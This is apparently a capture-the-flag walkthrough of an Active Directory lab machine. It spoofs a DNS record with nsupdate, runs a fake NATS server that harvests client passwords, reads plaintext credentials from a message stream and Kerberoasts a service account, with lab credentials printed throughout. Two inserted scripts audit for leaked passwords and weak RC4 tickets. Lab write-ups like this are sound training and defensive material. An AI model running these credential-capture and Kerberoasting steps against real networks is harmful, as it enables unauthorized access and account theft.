Nmap

/usr/lib/nmap/nmap --privileged -sC -sV -Pn -oN ./nmap.txt 10.xx.xx.xx
Nmap scan report for 10.xx.xx.xx
Host is up (0.43s latency).
Not shown: 985 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-20 11:19:33Z)
111/tcp   open  rpcbind?
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active 
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
2049/tcp  open  mountd        1-3 (RPC #100005)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
50300/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
| smb2-time: 
|_clock-skew: -2h59m07s

Add dc01.mirage.htb and mirage.htb to our /etc/hosts.

NFS service

First, we don't have any credentials to start with, but the scan shows that the NFS service is enabled:

2049/tcp  open  mountd        1-3 (RPC #100005)

┌──(kali㉿kali)-[~]
└─$ showmount -e 10.xx.xx.xx
Export list for 10.xx.xx.xx:
/MirageReports (everyone)

So let's mount it on our local machine and see what it contains:

┌──(kali㉿kali)-[~]
└─$ mkdir /tmp/mirage  

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 10.xx.xx.xx:/MirageReports /tmp/mirage

Listing the mount, we find two PDF files:

┌──(root㉿kali)-[/tmp/mirage]
└─# ls
Incident_Report_Missing_DNS_Record_nats-svc.pdf
Mirage_Authentication_Hardening_Report.pdf

[Screenshot: Incident_Report_Missing_DNS_Record_nats-svc.pdf]

[Screenshot: Mirage_Authentication_Hardening_Report.pdf]

To summarize the two reports:

  1. NTLM authentication has been abandoned in favour of a Kerberos-only authentication mode
  2. The DNS record for nats-svc.mirage.htb is missing, so we can create one and use a responder-style listener to obtain the authentication

Since the domain is Kerberos-only, our tools need the realm and KDC, so let's first configure our /etc/krb5.conf:

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = MIRAGE.HTB

[realms]
    MIRAGE.HTB = {
        kdc = dc01.MIRAGE.HTB
        admin_server = dc01.MIRAGE.HTB
        default_domain = MIRAGE.HTB
    }

[domain_realm]
    .MIRAGE.HTB = MIRAGE.HTB
    MIRAGE.HTB = MIRAGE.HTB

Then let's write a fake NATS server and use nsupdate to send the DNS update message.
fake_server.py

import socket

# Listen on the standard NATS client port; the DNS record we add points the
# real nats-svc client at this host.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", 4222))
s.listen(5)
print("[+] Fake NATS Server listening on 0.0.0.0:4222")

while True:
    client, addr = s.accept()
    print(f"[+] Connection from {addr}")

    # Send a fake INFO line (required for the NATS handshake); a client that
    # sees auth_required answers with its CONNECT frame, credentials included.
    client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')

    data = client.recv(1024)
    print("[>] Received:")
    print(data.decode(errors="replace"))

    # Optional: respond with -ERR or just close the connection
    client.close()

Then run the script and send the update message:

┌──(kali㉿kali)-[~]
└─$ nsupdate
> server 10.xx.xx.xx
> update add nats-svc.mirage.htb 3600 A 10.xx.xx.xx
> send

┌──(kali㉿kali)-[~]
└─$ python3 script.py                              
[+] Fake NATS Server listening on 0.0.0.0:4222
[+] Connection from ('10.xx.xx.xx', 64823)
[>] Received:
CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}

We successfully capture a credential: Dev_Account_A:hx5h7F5554fP@1337!

Then we can use the nats CLI to interact with the service using this credential:
https://github.com/nats-io

┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats context add dev-nats \
  --server nats://dc01.mirage.htb:4222 \
  --user Dev_Account_A \
  --password 'hx5h7F5554fP@1337!' \
  --description "Dev access"
NATS Configuration Context "dev-nats"

  Description: Dev access
  Server URLs: nats://dc01.mirage.htb:4222
     Username: Dev_Account_A
     Password: ******************
         Path: /home/kali/.config/nats/context/dev-nats.json

┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats --context dev-nats sub ">" --count 10 

We successfully connect to the NATS service.
Now let's focus on the auth_logs stream and retrieve its historical messages by creating a JetStream consumer and pulling from it with the consumer next command.

┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit

Configuration:

                    Name: audit-reader
               Pull Mode: true
          Filter Subject: logs.auth
          Deliver Policy: All
              Ack Policy: Explicit
                Ack Wait: 30.00s
           Replay Policy: Instant
      Maximum Deliveries: 1
         Max Ack Pending: 5
       Max Waiting Pulls: 512

State:

            Host Version: 2.11.3
      Required API Level: 0 hosted at level 1
  Last Delivered Message: Consumer sequence: 0 Stream sequence: 0
    Acknowledgment Floor: Consumer sequence: 0 Stream sequence: 0
        Outstanding Acks: 0 out of maximum 5
    Redelivered Messages: 0
    Unprocessed Messages: 5
           Waiting Pulls: 0 of maximum 512

Then let's pull the messages:

┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack

[15:20:12] subj: logs.auth / tries: 1 / cons seq: 1 / str seq: 1 / pending: 4

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.xx.xx.xx"}

Acknowledged message after 629.702564ms delay

[15:20:13] subj: logs.auth / tries: 1 / cons seq: 2 / str seq: 2 / pending: 3

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.xx.xx.xx"}

Acknowledged message after 358.081989ms delay

[15:20:14] subj: logs.auth / tries: 1 / cons seq: 3 / str seq: 3 / pending: 2

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.xx.xx.xx"}

Acknowledged message after 2.428837443s delay

[15:20:18] subj: logs.auth / tries: 1 / cons seq: 4 / str seq: 4 / pending: 1

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.xx.xx.xx"}

Acknowledged message after 549.003677ms delay

[15:20:19] subj: logs.auth / tries: 1 / cons seq: 5 / str seq: 5 / pending: 0

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.xx.xx.xx"}

Acknowledged message after 3.238919648s delay

We successfully get another credential: david.jjackson:pN8kQmn6b86!1234@
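Both the CONNECT frame captured by the fake server and the logs.auth messages above carry a password as a plaintext JSON field. The following is an added example, not part of the original writeup or the NATS project: a small auditor that scans such records, reports where a credential field appears (and, for CONNECT frames, whether tls_required was set), and produces a redacted copy safe to forward to a SIEM. The sample lines and the secret values in them are constructed placeholders shaped like the records above, not captured traffic.

```python
import json
from typing import Any, Dict, List, Optional, Tuple

# Field names that should never carry a plaintext value on a message bus
# or in a persisted log stream.
SECRET_KEYS = ("pass", "password", "auth_token", "token", "secret")

# Constructed sample lines (placeholder secrets), shaped like the NATS
# CONNECT frame and the logs.auth messages seen above; not captured data.
SAMPLE_RECORDS = [
    'CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A",'
    '"pass":"example-secret-1","tls_required":false,"name":"NATS CLI Version 0.2.2",'
    '"lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,'
    '"no_responders":false}',
    '{"user":"david.jjackson","password":"example-secret-2","ip":"10.0.0.5"}',
    '{"user":"svc_mirage","event":"logon","result":"ok","ip":"10.0.0.9"}',
    'PING',
]


def parse_record(line: str) -> Optional[Tuple[str, Dict[str, Any]]]:
    """Classify one line as a NATS CONNECT frame or a JSON log record.

    Returns ("connect", payload) or ("log", payload); None for anything
    else (keep-alives such as PING, non-JSON lines)."""
    text = line.strip()
    kind = "log"
    if text.startswith("CONNECT "):
        kind = "connect"
        text = text[len("CONNECT "):]
    try:
        payload = json.loads(text)
    except json.JSONDecodeError:
        return None
    if not isinstance(payload, dict):
        return None
    return kind, payload


def secret_fields(payload: Dict[str, Any]) -> List[str]:
    """Names of the fields in a record that hold a non-empty secret value."""
    return [k for k in payload if k.lower() in SECRET_KEYS and payload[k]]


def redact(payload: Dict[str, Any]) -> Dict[str, Any]:
    """Copy of the record with every secret field masked."""
    return {k: ("***" if k.lower() in SECRET_KEYS else v) for k, v in payload.items()}


def audit(lines: List[str]) -> List[Dict[str, Any]]:
    """Scan NATS traffic or stream dumps and report records exposing credentials."""
    findings = []
    for idx, line in enumerate(lines):
        parsed = parse_record(line)
        if parsed is None:
            continue
        kind, payload = parsed
        leaked = secret_fields(payload)
        if not leaked:
            continue
        if kind == "connect":
            tls = bool(payload.get("tls_required", False))
            issue = ("client authenticates with a password over a non-TLS connection"
                     if not tls else "password-based client auth (prefer NKey/JWT credentials)")
        else:
            tls = None
            issue = "plaintext credential persisted in a log/stream record"
        findings.append({
            "index": idx,
            "kind": kind,
            "user": payload.get("user"),
            "secret_fields": leaked,
            "tls_required": tls,
            "issue": issue,
            "redacted": redact(payload),
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_RECORDS):
        print(f"[{f['kind']}] user={f['user']} fields={f['secret_fields']}: {f['issue']}")
        print("    redacted:", json.dumps(f["redacted"]))
```

Feeding the auditor the output of a stream dump (for example the lines printed by the consumer next command above) flags every record whose password field would otherwise sit readable by any account allowed to subscribe to the stream, which is exactly how the second credential was obtained here.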

Then let's validate the credential, syncing our clock with the DC first (the scan reported a clock skew of about three hours, and Kerberos rejects requests with a large skew):

┌──(kali㉿kali)-[~]
└─$ sudo ntpdate dc01.mirage.htb                                    
2025-07-20 12:30:51.216502 (+0000) -10324.444328 +/- 0.233875 dc01.mirage.htb 10.xx.xx.xx  s1 no-leap
CLOCK: time stepped by -10324.444328
┌──(kali㉿kali)-[~]
└─$ nxc ldap 10.xx.xx.xx -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
LDAP        10.10.11.7     389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        10.10.11.7     389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@

We can also enumerate the domain users:

┌──(kali㉿kali)-[~]
└─$ nxc ldap 10.xx.xx.xx -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --users
LDAP        10.xx.xx.xx     389    DC01             [*] None (name:DC01) (domain:mirage.htb)
LDAP        10.xx.xx.xx     389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@ 
LDAP        10.xx.xx.xx     389    DC01             [*] Enumerated 10 domain users: mirage.htb
LDAP        10.xx.xx.xx     389    DC01             -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        10.xx.xx.xx     389    DC01             Administrator                 2025-06-23 21:18:18 0        Built-in account for administering the computer/domain      
LDAP        10.xx.xx.xx     389    DC01             Guest                         <never>             0        Built-in account for guest access to the computer/domain    
LDAP        10.xx.xx.xx     389    DC01             krbtgt                        2025-05-01 07:42:23 0        Key Distribution Center Service Account                     
LDAP        10.xx.xx.xx     389    DC01             Dev_Account_A                 2025-05-27 14:05:12 0                                                                    
LDAP        10.xx.xx.xx     389    DC01             Dev_Account_B                 2025-05-02 08:28:11 1                                                                    
LDAP        10.xx.xx.xx     389    DC01             david.jjackson                2025-05-02 08:29:50 0                                                                    
LDAP        10.xx.xx.xx     389    DC01             javier.mmarshall              2025-07-20 06:32:54 0        Contoso Contractors                                         
LDAP        10.xx.xx.xx     389    DC01             mark.bbond                    2025-06-23 21:18:18 0                                                                    
LDAP        10.xx.xx.xx     389    DC01             nathan.aadam                  2025-06-23 21:18:18 0                                                                    
LDAP        10.xx.xx.xx     389    DC01             svc_mirage                    2025-05-22 20:37:45 0        Old service account migrated by contractors   

We can also collect BloodHound data with this user:

┌──(kali㉿kali)-[~]
└─$ bloodhound-python  -u david.jjackson -p 'pN8kQmn6b86!1234@' -k -d mirage.htb -ns 10.xx.xx.xx -c ALl --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: mirage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.mirage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.mirage.htb
INFO: Found 12 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.mirage.htb
INFO: Done in 01M 41S
INFO: Compressing output into 20250720123334_bloodhound.zip

Sibling Objects in the Same OU

We can use impacket-GetUserSPNs to request a Kerberos TGS ticket (Kerberoasting) for nathan.aadam, who has an SPN registered:

┌──(kali㉿kali)-[~]
└─$ impacket-GetUserSPNs 'mirage.htb/david.jjackson' -dc-host dc01.mirage.htb -k -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName      Name          MemberOf                                                             PasswordLastSet             LastLogon                   Delegation 
------------------------  ------------  -------------------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/exchange.mirage.htb  nathan.aadam  CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb  2025-06-23 21:18:18.584667  2025-07-20 06:49:05.069834             

Then we can use hashcat (mode 13100, Kerberos 5 TGS-REP etype 23) to crack nathan's password:

┌──(kali㉿kali)-[~]
└─$ hashcat nathan.hash /usr/share/wordlists/rockyou.txt -m 13100 --show
$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/
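The hash prefix above ($krb5tgs$23$) shows the ticket was issued with RC4-HMAC (etype 23), whose key is derived directly from the account's NT hash, which is why it is cheap to crack offline. As an added example (not part of the original writeup or of hashcat), the parser below reads lines in the hashcat mode 13100 layout, which I assume to be $krb5tgs$<etype>$*account$REALM$spn*$checksum$edata2, and flags accounts whose service tickets came back with RC4 so a defender can prioritise them for remediation (AES-only msDS-SupportedEncryptionTypes, gMSA or a long random password). The sample hash is constructed with placeholder SPN and hex data, not the real ticket from the box.

```python
import re
from typing import Any, Dict, List, Optional

# hashcat mode 13100 layout (assumed): $krb5tgs$23$*account$REALM$spn*$checksum$edata2
# checksum is the 16-byte HMAC-MD5 (32 hex chars) for RC4-HMAC tickets.
KRB5TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<account>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata2>[0-9a-fA-F]+)$"
)

# rc4-hmac: the ticket is encrypted with a key equal to the NT hash, so
# a cracker can test candidate passwords at NTLM speed.
RC4_ETYPES = {23}

# Constructed sample lines: placeholder SPN and placeholder hex, not a real ticket.
SAMPLE_HASHES = [
    "$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/exampleservice*$"
    + "0f" * 16 + "$" + "ab" * 64,
    "not a hash line",
]


def parse_krb5tgs(line: str) -> Optional[Dict[str, Any]]:
    """Split one mode-13100 line into its fields; None if it does not match."""
    m = KRB5TGS_RE.match(line.strip())
    if m is None:
        return None
    return {
        "etype": int(m.group("etype")),
        "account": m.group("account"),
        "realm": m.group("realm"),
        "spn": m.group("spn"),
        "checksum": m.group("checksum").lower(),
        # edata2 is hex, so two characters per byte of encrypted ticket
        "ticket_bytes": len(m.group("edata2")) // 2,
    }


def assess(lines: List[str]) -> List[Dict[str, Any]]:
    """Parse every hash line and annotate each account with its exposure."""
    report = []
    for line in lines:
        parsed = parse_krb5tgs(line)
        if parsed is None:
            continue
        weak = parsed["etype"] in RC4_ETYPES
        parsed["weak"] = weak
        parsed["recommendation"] = (
            "service ticket issued with RC4-HMAC: restrict the account to AES "
            "(msDS-SupportedEncryptionTypes) and move it to a gMSA or a long random password"
            if weak
            else "AES ticket; still make sure the account password is long and random"
        )
        report.append(parsed)
    return report


if __name__ == "__main__":
    for entry in assess(SAMPLE_HASHES):
        flag = "WEAK" if entry["weak"] else "ok"
        print(f"[{flag}] {entry['realm']}\\{entry['account']} spn={entry['spn']} "
              f"etype={entry['etype']} ticket={entry['ticket_bytes']} bytes")
        print("      ", entry["recommendation"])
```

Run against the file of hashes a ticket request produced (here nathan.hash), the report lists which SPN accounts are still answering with RC4 tickets; on the defensive side the same condition shows up as Kerberos service ticket requests (Event ID 4769) with encryption type 0x17 for those accounts.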